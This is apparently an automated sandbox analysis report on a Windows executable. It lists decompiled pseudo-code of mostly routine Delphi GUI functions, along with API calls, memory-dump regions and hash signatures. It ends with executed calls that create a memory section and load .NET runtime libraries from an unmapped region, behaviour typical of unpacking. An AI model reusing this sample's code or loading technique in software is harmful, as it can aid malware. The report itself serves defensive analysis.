                                                                        						E00423824( *((intOrPtr*)(_t61 + 0x28)));
                                                                        						E00423828( *((intOrPtr*)(_v8 + 0x28)));
                                                                        						 *((intOrPtr*)(_v8 + 0x28)) =  *((intOrPtr*)(_t61 + 0x28));
                                                                        						 *((char*)(_v8 + 0x21)) =  *((intOrPtr*)(_t61 + 0x21));
                                                                        						 *((intOrPtr*)(_v8 + 0x34)) =  *((intOrPtr*)(_t61 + 0x34));
                                                                        						 *((char*)(_v8 + 0x38)) =  *((intOrPtr*)(_t61 + 0x38));
                                                                        					}
                                                                        					_pop(_t52);
                                                                        					 *[fs:eax] = _t52;
                                                                        					_push(E0042442F);
                                                                        					_push(0x496a44);
                                                                        					L004069F4();
                                                                        					return 0;
                                                                        				} else {
                                                                        					_t57 =  *0x41e4f8; // 0x41e544
                                                                        					if(E00403768(__edx, _t57) == 0) {
                                                                        						_t41 = E00414AEC(_v8, _t43);
                                                                        						return _t41;
                                                                        					} else {
                                                                        						goto L2;
                                                                        					}
                                                                        				}
                                                                        			}



















                                                                        APIs
                                                                        • RtlEnterCriticalSection.KERNEL32(00496A44), ref: 0042439B
                                                                        • RtlLeaveCriticalSection.KERNEL32(00496A44,0042442F,00000000,00424428,?,00496A44), ref: 00424422
                                                                          • Part of subcall function 00424D94: RtlEnterCriticalSection.KERNEL32(00496A44,00000000,?,?), ref: 00424E37
                                                                          • Part of subcall function 00424D94: RtlLeaveCriticalSection.KERNEL32(00496A44,00424E82,00496A44,00000000,?,?), ref: 00424E75
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: CriticalSection$EnterLeave
                                                                        • String ID: DA
                                                                        • API String ID: 3168844106-2080325668
                                                                        • Opcode ID: 5d0da1682d0e5b429fc274aee8455fbd1da520e3d31fc12b12d033f2833a3ec8
                                                                        • Instruction ID: c0367e46b2f5dfdd1aae6d6533981f87ee97dc4ca3a2f4a29e9ac0bbf231dd87
                                                                        • Opcode Fuzzy Hash: 5d0da1682d0e5b429fc274aee8455fbd1da520e3d31fc12b12d033f2833a3ec8
                                                                        • Instruction Fuzzy Hash: B0210B347042459FCB10EF99D982A9EB7F5EF8C314BA141BAB805E7751CA38ED01DB58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00449774(void* __eax, void* __edx, void* __eflags) {
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t24;
                                                                        				intOrPtr* _t27;
                                                                        				intOrPtr _t29;
                                                                        				void* _t39;
                                                                        				intOrPtr _t42;
                                                                        				intOrPtr _t45;
                                                                        				int _t50;
                                                                        				void* _t51;
                                                                        
                                                                        				_t51 = __eax;
                                                                        				_t39 = 0;
                                                                        				_t50 = E004496B8(__eax, 1, __edx);
                                                                        				if(_t50 == 0) {
                                                                        					if(( *(_t51 + 0x1c) & 0x00000010) == 0) {
                                                                        						_t45 =  *0x445600; // 0x44564c
                                                                        						if(E00403768(_t51, _t45) != 0) {
                                                                        							E0044878C( *((intOrPtr*)(_t51 + 0x34)));
                                                                        						}
                                                                        					}
                                                                        				} else {
                                                                        					if(( *(_t50 + 0x1c) & 0x00000010) == 0) {
                                                                        						E0044878C(_t50);
                                                                        					}
                                                                        					 *((intOrPtr*)( *_t50 + 0x44))();
                                                                        					_t24 = E00448E24(_t50, _t39, 0, _t50, _t51);
                                                                        					if((_t24 | E00449320(_t50, 0)) != 0) {
                                                                        						E004467FC(_t50, 0);
                                                                        					}
                                                                        					_t27 =  *0x495ad0; // 0x496c04
                                                                        					_t29 =  *((intOrPtr*)( *_t27 + 0x44));
                                                                        					if(_t29 != 0) {
                                                                        						_t42 = _t29;
                                                                        						if( *((char*)(_t42 + 0x22f)) == 2 && _t50 ==  *((intOrPtr*)(_t42 + 0x258)) && SendMessageA( *(_t42 + 0x254), 0x234, 0, 0) != 0) {
                                                                        							DrawMenuBar(E0043CC2C(_t42));
                                                                        						}
                                                                        					}
                                                                        					_t39 = 1;
                                                                        				}
                                                                        				return _t39;
                                                                        			}















                                                                        APIs
                                                                        • SendMessageA.USER32 ref: 004497FA
                                                                        • DrawMenuBar.USER32(00000000,?,00000234,00000000,00000000), ref: 0044980B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: DrawMenuMessageSend
                                                                        • String ID: LVD
                                                                        • API String ID: 2625368238-462541549
                                                                        • Opcode ID: 9d3d48822c4483685cc29d77eb33797c0968a31a1f1403c72cd18c5fa7b84299
                                                                        • Instruction ID: cfaac2668dddabe2e03c8476e39bbb8de488bb8272c0d5f02b7a156072d18efa
                                                                        • Opcode Fuzzy Hash: 9d3d48822c4483685cc29d77eb33797c0968a31a1f1403c72cd18c5fa7b84299
                                                                        • Instruction Fuzzy Hash: AF117C307006404BEB21FF6E8C8576B67966F86308F58547AF804CB392DA79EC06A79D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00436968(void* __eflags, intOrPtr _a4) {
                                                                        				char _v5;
                                                                        				struct tagRECT _v21;
                                                                        				struct tagRECT _v40;
                                                                        				void* _t40;
                                                                        				void* _t45;
                                                                        
                                                                        				_v5 = 1;
                                                                        				_t44 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30)) + 0x198));
                                                                        				_t45 = E00414264( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30)) + 0x198)),  *((intOrPtr*)(_a4 - 4)));
                                                                        				if(_t45 <= 0) {
                                                                        					L5:
                                                                        					_v5 = 0;
                                                                        				} else {
                                                                        					do {
                                                                        						_t45 = _t45 - 1;
                                                                        						_t40 = E00414208(_t44, _t45);
                                                                        						if( *((char*)(_t40 + 0x57)) == 0 || ( *(_t40 + 0x50) & 0x00000040) == 0) {
                                                                        							goto L4;
                                                                        						} else {
                                                                        							E00435F4C(_t40,  &_v40);
                                                                        							IntersectRect( &_v21, _a4 + 0xffffffec,  &_v40);
                                                                        							if(EqualRect( &_v21, _a4 + 0xffffffec) == 0) {
                                                                        								goto L4;
                                                                        							}
                                                                        						}
                                                                        						goto L6;
                                                                        						L4:
                                                                        					} while (_t45 > 0);
                                                                        					goto L5;
                                                                        				}
                                                                        				L6:
                                                                        				return _v5;
                                                                        			}









                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Rect$EqualIntersect
                                                                        • String ID: @
                                                                        • API String ID: 3291753422-2766056989
                                                                        • Opcode ID: b9d5a125bf218a009a68829a8c95d56b8c1c78d079be63f4ef73db18c465e3ad
                                                                        • Instruction ID: 4b7c01e8749ac2bd4959e066d72cd119708752121d29ea447919de7842c2e686
                                                                        • Opcode Fuzzy Hash: b9d5a125bf218a009a68829a8c95d56b8c1c78d079be63f4ef73db18c465e3ad
                                                                        • Instruction Fuzzy Hash: 1B1106716042486BCB01DA6CC885BDFBBEC9F49318F044292FC04EB342CB79DD448794
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 42%
                                                                        			E004717DC(char __edx, void* __edi, void* __esi) {
                                                                        				char _v5;
                                                                        				void* __ebx;
                                                                        				void* __ecx;
                                                                        				void* __ebp;
                                                                        				void* _t12;
                                                                        				signed int _t21;
                                                                        				signed int _t22;
                                                                        				signed int _t25;
                                                                        				void* _t28;
                                                                        				void* _t31;
                                                                        				void* _t32;
                                                                        				char _t33;
                                                                        				signed int _t37;
                                                                        				void* _t39;
                                                                        				void* _t40;
                                                                        				void* _t41;
                                                                        				void* _t42;
                                                                        
                                                                        				_t40 = __esi;
                                                                        				_t39 = __edi;
                                                                        				_t33 = __edx;
                                                                        				if(__edx != 0) {
                                                                        					_t42 = _t42 + 0xfffffff0;
                                                                        					_t12 = E00403940(_t12, _t41);
                                                                        				}
                                                                        				_v5 = _t33;
                                                                        				_t31 = _t12;
                                                                        				E00438AC4(_t31, _t32, 0, _t39, _t40);
                                                                        				E00435D68(_t31, GetSystemMetrics(2));
                                                                        				E00435D8C(_t31, GetSystemMetrics(0x14));
                                                                        				_t21 =  *(_t31 + 0x4c);
                                                                        				_t37 = _t21;
                                                                        				_t22 = _t21 >> 1;
                                                                        				if(0 < 0) {
                                                                        					asm("adc eax, 0x0");
                                                                        				}
                                                                        				E00435D8C(_t31, _t37 + _t22);
                                                                        				 *((char*)(_t31 + 0x208)) = 1;
                                                                        				 *((short*)(_t31 + 0x212)) = 0x64;
                                                                        				 *((intOrPtr*)(_t31 + 0x214)) = 1;
                                                                        				 *((char*)(_t31 + 0x228)) = 1;
                                                                        				 *((char*)(_t31 + 0x229)) = 1;
                                                                        				 *((char*)(_t31 + 0x21e)) = 1;
                                                                        				_t25 =  *0x47188c; // 0x80
                                                                        				 *(_t31 + 0x50) =  !_t25 &  *(_t31 + 0x50);
                                                                        				_t28 = _t31;
                                                                        				if(_v5 != 0) {
                                                                        					E00403998(_t28);
                                                                        					_pop( *[fs:0x0]);
                                                                        				}
                                                                        				return _t31;
                                                                        			}




















                                                                        0x00471869
                                                                        0x0047186c
                                                                        0x00471872
                                                                        0x00471874
                                                                        0x00471879
                                                                        0x00471880
                                                                        0x00471888

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: MetricsSystem
                                                                        • String ID: d
                                                                        • API String ID: 4116985748-2564639436
                                                                        • Opcode ID: 19e6b5c28e468764134af8d16d4fbe5a215d9376d4effbce3a1d784a4ddeab67
                                                                        • Instruction ID: 0b87a267c4685935d203ee5a8c4fb54ab077512866400b8bfe7b889297467223
                                                                        • Opcode Fuzzy Hash: 19e6b5c28e468764134af8d16d4fbe5a215d9376d4effbce3a1d784a4ddeab67
                                                                        • Instruction Fuzzy Hash: 351182717443409BE700EF7D98CA3857AD05B1530CF0890BDEC488F397DABE95488369
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 68%
                                                                        			E004274B0(intOrPtr _a4, intOrPtr _a8, signed int _a12) {
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				void* _t15;
                                                                        				void* _t16;
                                                                        				intOrPtr _t18;
                                                                        				signed int _t19;
                                                                        				void* _t20;
                                                                        				intOrPtr _t21;
                                                                        
                                                                        				_t19 = _a12;
                                                                        				if( *0x496ac7 != 0) {
                                                                        					_t16 = 0;
                                                                        					if((_t19 & 0x00000003) != 0) {
                                                                        						L7:
                                                                        						_t16 = 0x12340042;
                                                                        					} else {
                                                                        						_t21 = _a4;
                                                                        						if(_t21 >= 0 && _t21 < GetSystemMetrics(0) && _a8 >= 0 && GetSystemMetrics(1) > _a8) {
                                                                        							goto L7;
                                                                        						}
                                                                        					}
                                                                        				} else {
                                                                        					_t18 =  *0x496aa8; // 0x4274b0
                                                                        					 *0x496aa8 = E00427218(3, _t15, _t18, _t19, _t20);
                                                                        					_t16 =  *0x496aa8(_a4, _a8, _t19);
                                                                        				}
                                                                        				return _t16;
                                                                        			}














                                                                        APIs
                                                                        • GetSystemMetrics.USER32 ref: 004274FE
                                                                        • GetSystemMetrics.USER32 ref: 00427510
                                                                          • Part of subcall function 00427218: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00427298
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: MetricsSystem$AddressProc
                                                                        • String ID: MonitorFromPoint
                                                                        • API String ID: 1792783759-1072306578
                                                                        • Opcode ID: f7ecf0ea672574d08a9988f9cecea0da0792823a781f49fc23c9cb090435b35f
                                                                        • Instruction ID: 0ca1a078767922ccf2f9ab2b13178130f2d88d21fff11c5ab282216ea325be36
                                                                        • Opcode Fuzzy Hash: f7ecf0ea672574d08a9988f9cecea0da0792823a781f49fc23c9cb090435b35f
                                                                        • Instruction Fuzzy Hash: 0201A232309224BFDB004F55FC84B5ABB55EB55364FD18037FA09ABA11D779DC818BA8
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 72%
                                                                        			E0043E63C(void* __eax, char __ecx, struct HWND__* __edx, void* __eflags, char _a4) {
                                                                        				char _v8;
                                                                        				char _v12;
                                                                        				char _v16;
                                                                        				int* _t22;
                                                                        				void* _t28;
                                                                        
                                                                        				_v8 = __ecx;
                                                                        				_t28 = __eax;
                                                                        				_t22 = 0;
                                                                        				if(E00443514(__eax) != 0) {
                                                                        					_t32 = __edx -  *((intOrPtr*)(_t28 + 0x6c));
                                                                        					if(__edx !=  *((intOrPtr*)(_t28 + 0x6c))) {
                                                                        						E0043E6A0(_t28, _t32);
                                                                        						 *((intOrPtr*)(_t28 + 0x6c)) = __edx;
                                                                        						_t5 =  &_a4; // 0x434668
                                                                        						E0043E42C(__edx,  *_t5, _v8,  &_v16);
                                                                        						_t7 =  &_v12; // 0x434668
                                                                        						_push( *_t7);
                                                                        						_push(_v16);
                                                                        						_push( *((intOrPtr*)(_t28 + 0x6c)));
                                                                        						L00426B08();
                                                                        						asm("sbb ebx, ebx");
                                                                        						_t22 =  &(__edx->i);
                                                                        					}
                                                                        				}
                                                                        				return _t22;
                                                                        			}









                                                                        APIs
                                                                          • Part of subcall function 0043E6A0: 734518F0.COMCTL32(?,00000000,0043E665,00000000,00000000,00000000), ref: 0043E6B8
                                                                          • Part of subcall function 0043E42C: ClientToScreen.USER32(?,C), ref: 0043E444
                                                                          • Part of subcall function 0043E42C: GetWindowRect.USER32 ref: 0043E44E
                                                                        • 73451850.COMCTL32(?,?,hFC,?,00000000,00000000,00000000), ref: 0043E687
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: 73451873451850ClientRectScreenWindow
                                                                        • String ID: hFC$hFC
                                                                        • API String ID: 1718620977-3271904332
                                                                        • Opcode ID: 8eed95cc1c404b6fc45a057da765cb1baadc94690517fec50dbe15e3b690cb91
                                                                        • Instruction ID: 83cfaa479dfe381d88bbdac577f0f16f2725ff20e945c221232cd3b5c31a28e6
                                                                        • Opcode Fuzzy Hash: 8eed95cc1c404b6fc45a057da765cb1baadc94690517fec50dbe15e3b690cb91
                                                                        • Instruction Fuzzy Hash: D9F06277B012096B8B10DE9E98C189EF7ACEB4C224B54817BF518D3341D635EE148794
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 68%
                                                                        			E00427388(intOrPtr* _a4, signed int _a8) {
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				intOrPtr* _t14;
                                                                        				intOrPtr _t16;
                                                                        				signed int _t17;
                                                                        				void* _t18;
                                                                        				void* _t19;
                                                                        
                                                                        				_t17 = _a8;
                                                                        				_t14 = _a4;
                                                                        				if( *0x496ac6 != 0) {
                                                                        					_t19 = 0;
                                                                        					if((_t17 & 0x00000003) != 0 ||  *((intOrPtr*)(_t14 + 8)) > 0 &&  *((intOrPtr*)(_t14 + 0xc)) > 0 && GetSystemMetrics(0) >  *_t14 && GetSystemMetrics(1) >  *((intOrPtr*)(_t14 + 4))) {
                                                                        						_t19 = 0x12340042;
                                                                        					}
                                                                        				} else {
                                                                        					_t16 =  *0x496aa4; // 0x427388
                                                                        					 *0x496aa4 = E00427218(2, _t14, _t16, _t17, _t18);
                                                                        					_t19 =  *0x496aa4(_t14, _t17);
                                                                        				}
                                                                        				return _t19;
                                                                        			}













                                                                        APIs
                                                                        • GetSystemMetrics.USER32 ref: 004273D9
                                                                        • GetSystemMetrics.USER32 ref: 004273E5
                                                                          • Part of subcall function 00427218: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00427298
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: MetricsSystem$AddressProc
                                                                        • String ID: MonitorFromRect
                                                                        • API String ID: 1792783759-4033241945
                                                                        • Opcode ID: 853a7fc467a0f53b6e0ee6d63dab54201dbae885feac652f51bdea48347bc6ca
                                                                        • Instruction ID: f4212cdc0bcdd90a97bb4186d0bbb8f5baa078fbbc89cb2f22bd8dfda28a6ed8
                                                                        • Opcode Fuzzy Hash: 853a7fc467a0f53b6e0ee6d63dab54201dbae885feac652f51bdea48347bc6ca
                                                                        • Instruction Fuzzy Hash: D4017C323081249BDB20CB64E985716BB59EB52390F958067EC05EB612C6B8DC40DBA9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00462F50(void* __eax) {
                                                                        				void* __ebp;
                                                                        				char _t7;
                                                                        				char _t8;
                                                                        				struct HINSTANCE__* _t12;
                                                                        				void* _t15;
                                                                        				signed int _t16;
                                                                        				void* _t19;
                                                                        				CHAR** _t20;
                                                                        
                                                                        				_t19 = __eax;
                                                                        				_t7 =  *0x462fb0; // 0x0
                                                                        				 *((char*)(__eax + 0x2b8)) = _t7;
                                                                        				_t8 =  *0x462fb0; // 0x0
                                                                        				 *((char*)(__eax + 0x2b9)) = _t8;
                                                                        				_t16 = 0;
                                                                        				_t20 = 0x47ac24;
                                                                        				do {
                                                                        					 *((intOrPtr*)(_t19 + 0x2bc + _t16 * 4)) = E004242CC(1);
                                                                        					_t12 =  *0x496714; // 0x400000
                                                                        					_t15 = E00425494(_t10, LoadBitmapA(_t12,  *_t20));
                                                                        					_t16 = _t16 + 1;
                                                                        					_t20 =  &(_t20[1]);
                                                                        				} while (_t16 != 5);
                                                                        				return _t15;
                                                                        			}












                                                                        APIs
                                                                        • LoadBitmapA.USER32 ref: 00462F91
                                                                          • Part of subcall function 00425494: GetObjectA.GDI32(?,00000054,?), ref: 004254CE
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: BitmapLoadObject
                                                                        • String ID: DA$d-F
                                                                        • API String ID: 4240920667-4117158572
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0044692C(void* __eax) {
                                                                        				void* _t16;
                                                                        				intOrPtr _t17;
                                                                        
                                                                        				_t16 = __eax;
                                                                        				if( *((intOrPtr*)(__eax + 0x34)) == 0) {
                                                                        					_t17 =  *0x445600; // 0x44564c
                                                                        					if(E00403768( *((intOrPtr*)(__eax + 4)), _t17) == 0) {
                                                                        						 *((intOrPtr*)(_t16 + 0x34)) = CreateMenu();
                                                                        					} else {
                                                                        						 *((intOrPtr*)(_t16 + 0x34)) = CreatePopupMenu();
                                                                        					}
                                                                        					if( *((intOrPtr*)(_t16 + 0x34)) == 0) {
                                                                        						E004459E0();
                                                                        					}
                                                                        					E004466C8(_t16);
                                                                        				}
                                                                        				return  *((intOrPtr*)(_t16 + 0x34));
                                                                        			}






                                                                        APIs
                                                                        • CreatePopupMenu.USER32(?,0044663F,00000000,00000000,00446683), ref: 00446947
                                                                        • CreateMenu.USER32(?,0044663F,00000000,00000000,00446683), ref: 00446951
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: CreateMenu$Popup
                                                                        • String ID: LVD
                                                                        • API String ID: 257293969-462541549
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 58%
                                                                        			E00433790(intOrPtr __eax) {
                                                                        				intOrPtr _t5;
                                                                        				intOrPtr _t10;
                                                                        				intOrPtr _t11;
                                                                        
                                                                        				_t10 = __eax;
                                                                        				ReleaseCapture();
                                                                        				_t5 = 0;
                                                                        				 *0x47a96c = 0;
                                                                        				if(_t10 != 0) {
                                                                        					_t11 =  *0x4323f0; // 0x43243c
                                                                        					_t5 = E00403768(_t10, _t11);
                                                                        					if(0 != 0) {
                                                                        						L4:
                                                                        						return SetCapture(E0043CC2C(_t10));
                                                                        					}
                                                                        					if( *((intOrPtr*)(_t10 + 0x30)) != 0) {
                                                                        						 *0x47a96c = _t10;
                                                                        						_t10 =  *((intOrPtr*)(_t10 + 0x30));
                                                                        						goto L4;
                                                                        					}
                                                                        				}
                                                                        				return _t5;
                                                                        			}







                                                                        APIs
                                                                        • ReleaseCapture.USER32(00000000,00436809,0000FFB8,?,0045FE8A), ref: 00433793
                                                                        • SetCapture.USER32(00000000,00000000,00436809,0000FFB8,?,0045FE8A), ref: 004337CB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Capture$Release
                                                                        • String ID: <$C
                                                                        • API String ID: 1520983071-3423417450
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 87%
                                                                        			E00434370(struct tagPOINT* __eax) {
                                                                        				struct HWND__* _t8;
                                                                        				void* _t9;
                                                                        
                                                                        				_push(__eax->y);
                                                                        				_t8 = WindowFromPoint( *__eax);
                                                                        				if(_t8 != 0) {
                                                                        					while(E00434328(_t8, _t9) == 0) {
                                                                        						_t8 = GetParent(_t8);
                                                                        						if(_t8 != 0) {
                                                                        							continue;
                                                                        						}
                                                                        						goto L3;
                                                                        					}
                                                                        				}
                                                                        				L3:
                                                                        				return _t8;
                                                                        			}






                                                                        APIs
                                                                        • WindowFromPoint.USER32(YBC,?,00000000,00433F52,?,-0000000C,?), ref: 00434376
                                                                          • Part of subcall function 00434328: GlobalFindAtomA.KERNEL32 ref: 0043433C
                                                                          • Part of subcall function 00434328: GetPropA.USER32 ref: 00434353
                                                                        • GetParent.USER32(00000000), ref: 0043438D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: AtomFindFromGlobalParentPointPropWindow
                                                                        • String ID: YBC
                                                                        • API String ID: 3524704154-2981556608
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Executed Functions

                                                                        APIs
                                                                        • NtCreateSection.NTDLL(?,?,?,?,?,?,?), ref: 00490186
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.735159301.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                        Similarity
                                                                        • API ID: CreateSection
                                                                        • String ID:
                                                                        • API String ID: 2449625523-0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.735159301.0000000000489000.00000040.00000001.sdmp, Offset: 00489000, based on PE: false
                                                                        Similarity
                                                                        • API ID: LibraryLoad$_memset
                                                                        • String ID: Culture.dll$Gdiplus.dll$advapi32.dll$diasymreader.dll$iphlpapi.dll$mscordacwks.dll$mscoree.dll$mscorjit.dll$mscorrc.dll$mscorsec.dll$mscorwks.dll$ole32.dll$shfolder.dll$sxs.dll$user32.dll
                                                                        • API String ID: 240438931-1803115895
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
